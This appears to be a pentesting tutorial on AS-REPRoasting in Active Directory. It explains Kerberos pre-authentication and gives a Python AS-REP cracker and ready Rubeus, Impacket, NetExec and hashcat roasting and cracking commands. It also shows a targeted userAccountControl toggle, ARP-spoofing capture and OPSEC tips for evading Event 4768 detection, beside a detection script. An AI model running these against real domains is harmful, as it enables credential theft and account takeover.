# AS-REPRoasting

## Overview

{% hint style="info" %}

* [How to Hack Active Directory with ASREP Roasting](https://www.youtube.com/watch?v=wA9w8t1fRWo)
* [Attacking Active Directory - AS-REP Roasting](https://www.youtube.com/watch?v=EVdwnBFtUtQ)
  {% endhint %}

{% hint style="success" %}
This attack can prove useful for:

* Persistence → a cracked password lets us regain access later, for as long as the account keeps it.
* Privilege Escalation → we can compromise a user without knowing or resetting their password, so the victim notices nothing.
{% endhint %}

AS-REPRoasting targets the first step of Kerberos authentication (the AS-REQ/AS-REP exchange) and is typically performed after obtaining a list of valid domain users.

Pre-authentication is a Kerberos safeguard: before the KDC issues a TGT, the client must prove knowledge of the account's password by sending a timestamp encrypted with a key derived from that password (PA-ENC-TIMESTAMP). If the KDC can decrypt and validate the timestamp, the request is genuine. Without this step, anyone could ask the KDC for material encrypted under a chosen user's key and attack it offline.

If an account has the [`Do not require Kerberos pre-authentication`](https://www.tenable.com/blog/how-to-stop-the-kerberos-pre-authentication-attack-in-active-directory) option enabled (the `DONT_REQ_PREAUTH` bit, `0x400000`, of `userAccountControl`), any unauthenticated client with network access to the KDC can request a TGT for that account and receive an AS-REP. The AS-REP carries two encrypted parts: the TGT, encrypted with the `krbtgt` key, and the user-KDC session key, encrypted with a key derived from the account's password. The second part is what the attacker extracts and cracks offline; recovering the password compromises the account without ever touching it.

{% code overflow="wrap" %}

```
           AS-REP (response from the KDC)
+----------------------------------------------+
|  +----------------------------------------+  |
|  |  1. Ticket Granting Ticket (TGT)       |  |
|  |     +-------------------------------+  |  |
|  |     | User information +            |  |  |
|  |     | User-KDC session key          |  |  |
|  |     +-------------------------------+  |  |
|  +----------------------------------------+  |
|        Encrypted with the krbtgt key         |
|                                              |
|  +----------------------------------------+  |
|  |  2. User-KDC session key               |  |  -------> AS-REPRoast
|  |     (same session key as in the TGT)   |  |
|  +----------------------------------------+  |
|        Encrypted with the user's key         |
+----------------------------------------------+
```

{% endcode %}
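The second box in the diagram is all the attacker needs. The Python below is an added example (not code from this page, nor from Rubeus, Impacket or hashcat) that spells out the RC4-HMAC (etype 23) protection of that enc-part as RFC 4757 defines it, emits the same `$krb5asrep$23$user@REALM:checksum$data` line that `/format:hashcat` and `-format hashcat` produce, and runs the offline dictionary attack that `hashcat -m 18200` performs. The account `svc_backup@BATMAN.LOCAL`, its password, the wordlist and the enc-part body are all constructed for the example; MD4 and RC4 are written out because `hashlib` frequently lacks MD4 and has no RC4.

```python
import hashlib, hmac, os, struct

MASK32 = 0xFFFFFFFF
AS_REP_ENC_PART = 8  # RC4-HMAC key-usage number for the AS-REP enc-part (RFC 4757, section 3)

def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320) in pure Python: hashlib's md4 is often disabled under OpenSSL 3."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & MASK32

    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (f, list(range(16)), (3, 7, 11, 19), 0x00000000),
        (g, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (h, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, order, shifts, k in rounds:
            for i, idx in enumerate(order):
                a = rotl((a + fn(b, c, d) + x[idx] + k) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> bytes:
    """RC4-HMAC long-term key = NT hash = MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 stream cipher (KSA + PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def _hmac_md5(key: bytes, msg: bytes) -> bytes: return hmac.new(key, msg, hashlib.md5).digest()

def rc4_hmac_encrypt(key, usage, plaintext, confounder=None):
    """KDC side (RFC 4757): K1 = HMAC(K, usage); output = checksum || RC4(K3, confounder || plaintext)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = (os.urandom(8) if confounder is None else confounder) + plaintext
    checksum = _hmac_md5(k1, data)
    return checksum + rc4(_hmac_md5(k1, checksum), data)

def rc4_hmac_decrypt(key, usage, ciphertext):
    """Cracker side, per guess: K3 from the checksum, RC4-decrypt, verify the HMAC. None = wrong key."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    checksum, edata = ciphertext[:16], ciphertext[16:]
    data = rc4(_hmac_md5(k1, checksum), edata)
    return data[8:] if hmac.compare_digest(_hmac_md5(k1, data), checksum) else None  # strip confounder

def to_hashcat_18200(user, realm, ciphertext):
    """hashcat -m 18200 / john krb5asrep line: the 16-byte checksum, then the RC4 data."""
    return f"$krb5asrep$23${user}@{realm}:{ciphertext[:16].hex()}${ciphertext[16:].hex()}"

def parse_hashcat_18200(line):
    ident, blob = line.split("$23$", 1)[1].split(":", 1)
    user, realm = ident.split("@", 1)
    return user, realm, bytes.fromhex(blob.replace("$", ""))

def crack_asrep(line, wordlist):
    """Offline dictionary attack: one MD4, three HMAC-MD5 and one RC4 per guess, no KDC involved."""
    _, _, ciphertext = parse_hashcat_18200(line)
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), AS_REP_ENC_PART, ciphertext) is not None:
            return candidate
    return None

# Stand-in for the EncASRepPart (ASN.1 [APPLICATION 25], first byte 0x79); a real one carries the
# session key, times and nonce. Only the checksum decides a crack, so the body is arbitrary here.
SAMPLE_PLAINTEXT = b"\x79\x81\x80" + bytes(range(128))

def build_sample_line(user="svc_backup", realm="BATMAN.LOCAL", password="Summer2024!"):
    """Constructed AS-REP enc-part for a pre-auth-disabled account, as the KDC would emit it."""
    ct = rc4_hmac_encrypt(nt_hash(password), AS_REP_ENC_PART, SAMPLE_PLAINTEXT, confounder=bytes(8))
    return to_hashcat_18200(user, realm, ct)

if __name__ == "__main__":
    line = build_sample_line()
    print(line)
    print("cracked:", crack_asrep(line, ["Password1", "Welcome1", "Summer2024!", "Winter2024!"]))
```

Two things to notice: the cracker never talks to the KDC again (every guess is purely local), and a guess costs one MD4 plus a few MD5-based HMACs and an RC4 pass, which is why RC4 AS-REPs of weak passwords fall in seconds. AES etypes (17/18) replace the NT-hash key with a PBKDF2-derived one (RFC 3962), so the same attack still works but each guess is far more expensive.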

## Tools <a href="#windows" id="windows"></a>

{% hint style="warning" %}
**OPSEC**: Roast one user at a time rather than every susceptible account in one go. Each AS-REQ sent without pre-authentication is still logged on the DC (Event ID 4768 with Pre-Authentication Type `0`), so a burst of them from one host for many accounts is an easy signature; a single request blends in far better, though it is not invisible.
{% endhint %}
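To make that note concrete, here is the defender's view as an added example (not from this page or any SIEM product). Windows Security Event 4768 (*A Kerberos authentication ticket (TGT) was requested*) records every AS-REQ the DC answers, including `PreAuthType`, where `0` means the request carried no pre-authentication, which is exactly what a roast looks like; `TicketEncryptionType` `0x17` (RC4-HMAC) alongside it is the classic signature. The rows below are constructed to mimic 4768 fields, not real logs, and the window and threshold are illustrative.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed 4768 records: (TimeCreated UTC, TargetUserName, IpAddress, PreAuthType, TicketEncryptionType)
SAMPLE_4768 = [
    ("2024-03-01T10:00:01", "j.smith",      "10.10.71.50", "2", "0x12"),  # normal logon: PA-ENC-TIMESTAMP, AES256
    ("2024-03-01T10:00:03", "svc_backup",   "10.10.71.99", "0", "0x17"),  # no pre-auth, RC4: a roast request
    ("2024-03-01T10:00:04", "svc_sql",      "10.10.71.99", "0", "0x17"),
    ("2024-03-01T10:00:04", "t.wayne",      "10.10.71.99", "0", "0x17"),
    ("2024-03-01T10:00:05", "a.pennyworth", "10.10.71.99", "0", "0x17"),
    ("2024-03-01T10:00:05", "b.gordon",     "10.10.71.99", "0", "0x17"),
    ("2024-03-01T11:30:00", "svc_legacy",   "10.10.71.60", "0", "0x17"),  # one request: quiet, but still logged
]

RC4_HMAC = "0x17"


def no_preauth_requests(events):
    """Every TGT request made without pre-authentication: the raw roasting signal, one row per account."""
    return [e for e in events if e[3] == "0"]


def roast_bursts(events, window=timedelta(minutes=5), min_users=3):
    """Source IPs that requested TGTs without pre-auth for >= min_users distinct accounts inside `window`.
    Returns {ip: most distinct accounts seen in one window}: the pattern 'roast everything at once'
    produces and 'one user at a time' avoids."""
    by_ip = defaultdict(list)
    for when, user, ip, preauth, _etype in events:
        if preauth == "0":
            by_ip[ip].append((datetime.fromisoformat(when), user))
    bursts = {}
    for ip, rows in by_ip.items():
        rows.sort()
        for i, (start, _) in enumerate(rows):
            users = {u for t, u in rows[i:] if t - start <= window}
            if len(users) >= min_users:
                bursts[ip] = max(bursts.get(ip, 0), len(users))
    return bursts


def rc4_roastable_accounts(events):
    """Accounts hit without pre-auth and with RC4-HMAC: the cheap-to-crack cases, sorted for reporting."""
    return sorted({user for _, user, _, preauth, etype in events if preauth == "0" and etype == RC4_HMAC})


if __name__ == "__main__":
    print("no-pre-auth requests:", len(no_preauth_requests(SAMPLE_4768)))
    print("burst sources:", roast_bursts(SAMPLE_4768))
    print("RC4-protected accounts:", rc4_roastable_accounts(SAMPLE_4768))
```

Run it and the five accounts hit from `10.10.71.99` within two seconds surface as a burst, while the lone request from `10.10.71.60` stays under the threshold. It is still in the log, and anyone baselining which accounts ever authenticate without pre-auth will see it: attacking one user at a time lowers the signal, it does not remove it.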

### Windows

{% code overflow="wrap" %}

```powershell
###########################################
# Enumeration of AS-REPRoastable accounts #
###########################################

# PowerView - filter on the DONT_REQ_PREAUTH bit of userAccountControl
Get-DomainUser -UACFilter DONT_REQ_PREAUTH
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

# PowerShell's Active Directory module
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

# Rubeus - no LDAP access needed: probes a list of usernames directly against the KDC
.\Rubeus.exe preauthscan /users:users.txt /domain:batman.local /dc:10.10.71.220

####################
# Attack execution #
####################

# All susceptible accounts (LDAP search for DONT_REQ_PREAUTH, then one AS-REQ per account)
.\Rubeus.exe asreproast /nowrap /format:hashcat /outfile:<fileName>

# A single account
.\Rubeus.exe asreproast /user:target.user /domain:batman.local /nowrap /format:hashcat /outfile:hashes.txt

#################
# Hash cracking #
#################

# Hashcat - mode 18200 = Kerberos 5, etype 23, AS-REP
hashcat -m 18200 asreproast.lst /usr/share/wordlists/rockyou.txt

# John
john --format=krb5asrep --wordlist=rockyou.txt --fork=4 asreproast.lst
```

{% endcode %}

### Linux

{% hint style="warning" %}
When attacking from Linux, use the target’s DNS server or configure `/etc/hosts` for the targets, domain, and DC.
{% endhint %}

{% hint style="info" %}

* [GetNPUsers & Kerberos Pre-Auth Explained](https://www.youtube.com/watch?v=pZSyGRjHNO4)
* For an example of AS-REPRoasting using `nxc`, see [Sauna](https://x7331.gitbook.io/boxes/boxes/easy/sauna#asreproasting).
  {% endhint %}

{% code overflow="wrap" %}

```shell
###########################################
# Enumeration of AS-REPRoastable accounts #
###########################################

# Impacket - with valid credentials (prompts for the password): LDAP search for UF_DONT_REQUIRE_PREAUTH
impacket-GetNPUsers batman.local/x7331 -dc-ip 10.10.71.220 -dc-host srv01.batman.local

# Impacket - without credentials: tries every name in the list; the per-user errors tell apart
# non-existent users, users with pre-auth enabled, and roastable users (whose hashes are written out)
impacket-GetNPUsers BATMAN/ -dc-ip 10.10.71.220 -usersfile users.txt -format hashcat -outputfile hashes.txt -no-pass

# Kerbrute - user enumeration through AS-REQs; dumps the AS-REP hash of any user found without pre-auth
kerbrute userenum -d batman.local --dc 10.10.71.220 /opt/jsmith.txt

####################
# Attack execution #
####################

# Impacket - all accounts: authenticated LDAP enumeration, then an AS-REQ for each
impacket-GetNPUsers batman.local/x7331 -dc-ip 10.10.71.220 -request -format hashcat -outputfile hashes.txt

# Impacket - all names in a list, unauthenticated
impacket-GetNPUsers BATMAN/ -dc-ip 10.10.71.220 -no-pass -usersfile users.txt -format hashcat -outputfile hashes.txt

# Impacket - single account
impacket-GetNPUsers batman.local/asreproastable-user -dc-ip 10.10.71.220 -no-pass

# NetExec - empty password = unauthenticated; roasts every name in users.txt
nxc ldap 10.10.71.220 -u users.txt -p '' --asreproast asreproast.lst

#################
# Hash cracking #
#################

# Hashcat - mode 18200 = Kerberos 5, etype 23, AS-REP
hashcat -m 18200 asreproast.lst /usr/share/wordlists/rockyou.txt

# John
john --format=krb5asrep --wordlist=rockyou.txt --fork=4 asreproast.lst
```

{% endcode %}

## Targeted AS-REPRoast

If no user has pre-authentication disabled but we hold `GenericWrite` or `GenericAll` over a user object, we can set the `DONT_REQ_PREAUTH` bit (`0x400000` = `4194304`) in that user's `userAccountControl`, roast the account, and then restore the attribute. The password itself is never touched, so the user notices nothing.

{% hint style="warning" %}
**OPSEC**: Don't forget to reset `userAccountControl` after extraction. `-XOR` toggles the bit, so running the same command a second time clears it. Both modifications are attribute changes on the user object and are logged on the DC as Event ID 4738 (*A user account was changed*) with the old and new UAC values.
{% endhint %}

{% code overflow="wrap" %}

```powershell
# Disable pre-authentication with PowerView: XOR 0x400000 (DONT_REQ_PREAUTH) into userAccountControl.
# XOR toggles the bit, so check the current value first: on an account that already has it set this would clear it.
Set-DomainObject -Identity <user> -XOR @{useraccountcontrol=4194304} -Verbose

# Request the AS-REP with Rubeus
.\Rubeus.exe asreproast /user:<user> /outfile:<fileName> /nowrap /format:hashcat

# Restore the original value: the same XOR flips the bit back off
Set-DomainObject -Identity <user> -XOR @{useraccountcontrol=4194304} -Verbose
```

{% endcode %}

## AS-REP via ARP-Spoofing

When a user logs on to a domain-joined workstation, Kerberos authentication starts automatically: the client sends an AS-REQ (with pre-authentication, since this user really knows the password) to the DC, which answers with an AS-REP. Pre-authentication protects against *unauthenticated* requests, but it does not change the response: the encrypted part of the AS-REP, holding the session key, is still protected with a key derived from the user's password. Anyone who can observe that response can extract this part and crack it offline exactly as with a roastable account. If a weak encryption type such as [RC4](https://learn.microsoft.com/en-us/windows-server/security/kerberos/detect-remediate-rc4-kerberos) is negotiated, guessing is cheap; with AES etypes the blob is still crackable, but every guess costs far more.

On local networks, hosts use the Address Resolution Protocol (ARP) to map IP addresses to MAC addresses. Because **ARP has no authentication**, an attacker in the same broadcast domain (VLAN) can send forged ARP replies to impersonate the DC towards the client and/or the client towards the DC. Traffic is then redirected through the attacker while both endpoints keep communicating normally: a **Man-in-the-Middle** position.

From this position, Kerberos traffic (TCP or UDP port 88) can be intercepted. The attacker captures the AS-REQ, relays it to the DC, and captures the AS-REP on its way back. The encrypted part of the AS-REP is extracted and formatted for offline password cracking.

This can be performed with the [ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) tool, which supports two modes:

* In **relay mode (recommended)**, ARP spoofing puts the attacker on the path of the clients' authentication traffic; each AS-REQ is intercepted and forwarded to the DC. If the DC still accepts RC4, the tool tries to force that encryption type so the captured AS-REP cracks much faster.
* In **listen mode**, only the gateway's ARP cache is poisoned and AS-REP responses are captured passively, with no modification of traffic. This is less intrusive, but the attacker has no influence on the encryption type used.

```bash
# Relay mode
ASRepCatcher relay -dc 192.168.1.100

# Listen mode
ASRepCatcher listen
```

